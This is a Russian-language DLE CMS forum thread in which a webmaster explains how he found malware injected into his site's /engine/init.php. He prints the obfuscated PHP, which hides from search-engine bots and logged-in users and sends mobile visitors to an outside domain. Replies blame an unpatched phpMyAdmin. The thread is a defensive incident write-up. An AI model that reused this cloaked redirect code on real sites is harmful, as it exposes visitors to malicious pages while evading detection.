olegoff 0 Опубликовано: 22 марта 2013 Рассказать Опубликовано: 22 марта 2013 (изменено) Здравствуйте! Позавчера в панели вебмастером от Яндекса увидел, что моему сайту на DLE присвоена поментка о наличии угрозы для компьютеров и мобильных устройств. Трафик с Яндекса упал практически в ноль. Первый беглый осмотр не выявил никаких аномалий. Написал в техподдержку Яндекса, что сайт чист. Но потом стал думать, что как в известном мультике "это жжже неспроста...". Написал простенький просмотрщик кодов ответа сервера на PHP и под разными узерагентами проверил сайт. Оказалось, что Яндес был все-таки прав. С мобильных устройств и версии сайта для них идет переадресация на левый сайт. Скрипт и отключение JavaScript в браузере показали, что к полной новости для мобильных устройств в самый верх страницы перед <html> добавляется вот такое: <script>window.location=("ht"+"tp:"+"//dledle.net/user/id?3&seo"+"ref="+encodeURIComponent(document.referrer)+ "¶"+"meter="+"word&se=&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL));</script> Задумано неплохо. На мобильную версию сайта многие заходят очень редко и заражение заметят очень не скоро. Начал искать вирус. Чтобы проще это было делать, сохранил все файлы сайта на локальный диск. Вирус нашелся в файле /engine/init.php. 1-я вставка $shka=strrev('eld'); 2-я вставка $bot = 0; $userAgent = strtolower($_SERVER['HTTP_USER_AGENT']); $bots = array('crawl', 'yande', 'googl', 'bot'); if( count($bots) ){foreach( $bots as $b ){if( strpos($userAgent, $ !== FALSE ){$bot = 1; break;}}}; if ( check_smartphone() ) {if (($_SERVER['REQUEST_URI'] != '/') and (!isset ($_COOKIE['dle_user_id'])) and (!$bot)) {echo "<s"."cript>window.loc"."ation=(\"ht\"+\"tp:\"+\"//"."dle".$shka.".net"."/user/id?3&seo\"+\"ref=\"+encodeURIComponent(document.referrer)+ \"¶\"+\"meter=$key\"+\"word&se=$se&ur=1&H"."TT"."P_REF"."ERER=\"+enc"."odeURIComponent(docu"."ment.URL));</s"."cript>";} if ( @is_dir ( ROOT_DIR . '/templates/smartphone' ) and ( $config['allow_smartphone'] )) { $config['skin'] = "smartphone"; $smartphone_detected = true; $config['allow_comments_wysiwyg'] = "no";}} if (!isset ( $do ) AND isset ($_REQUEST['do']) ) $do = totranslit ( $_REQUEST['do'] ); elseif(isset ( $do )) $do = totranslit ( $do ); else $do = ""; if (!isset ( $subaction ) AND isset ($_REQUEST['subaction']) ) $subaction = totranslit ($_REQUEST['subaction']); else $subaction = totranslit ($subaction); if ( isset ($_REQUEST['doaction']) ) $doaction = totranslit ($_REQUEST['doaction']); else $doaction = ""; if ($do == "tags" AND !$_GET['tag']) $do = "alltags"; [/code] Путь заражения файла остался невыяненным. Все патчи безопасности на моем DLE 9.7 были установлены. Надеюсь, что мой опыт поможет тем, кто пострадал от подобного вируса быстрее с ним справиться. Изменено 22 марта 2013 пользователем olegoff Цитата Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 22 марта 2013 Рассказать Опубликовано: 22 марта 2013 а вы читали форум на эту тему? там десятки постов было написано какие действия были предприняты, кроме непосредственно поиска и чистки? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 072 Опубликовано: 22 марта 2013 Рассказать Опубликовано: 22 марта 2013 Путь заражения файла остался невыяненным. Все патчи безопасности на моем DLE 9.7 были установлены. На вашем сайте есть как миниум одна серьезная уязвимость, а именно уязвимости в серверном ПО phpMyAdmin, он у вас стоит без патчей безопасности в открытом виде по стандартному пути панели ISP. Это только то что я увидел сразу. Может быть и другие проблемы безопасности. Что вам нужно делать попунктно описано в посте http://forum.dle-news.ru/index.php?showtopic=62025&view=findpost&p=309347 Цитата Ссылка на сообщение Поделиться на других сайтах
olegoff 0 Опубликовано: 22 марта 2013 Рассказать Опубликовано: 22 марта 2013 Автор На вашем сайте есть как миниум одна серьезная уязвимость, а именно уязвимости в серверном ПО phpMyAdmin, он у вас стоит без патчей безопасности в открытом виде по стандартному пути панели ISP. Это только то что я увидел сразу. Может быть и другие проблемы безопасности. Все верно. Серверное ПО действительно давно не обновлялось. Теперь буду относиться к таким вещам более внимательно. Цитата Ссылка на сообщение Поделиться на других сайтах
mazdov 0 Опубликовано: 17 октября 2013 Рассказать Опубликовано: 17 октября 2013 второй раз ловлю вирус для мобильных устрйств. сайт www.serial-online.net Когда переходишь на сайт через мобилу, происходит ридерект, загружаются вирусы. Подскажите где чистить, в init теперь не нахожу врага Цитата Ссылка на сообщение Поделиться на других сайтах
webair 178 Опубликовано: 22 октября 2013 Рассказать Опубликовано: 22 октября 2013 Да, было дело мобильную версию редиректило на левый сайт. Тогда это была вставка в htaccess в папке шаблона мобильной версии Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.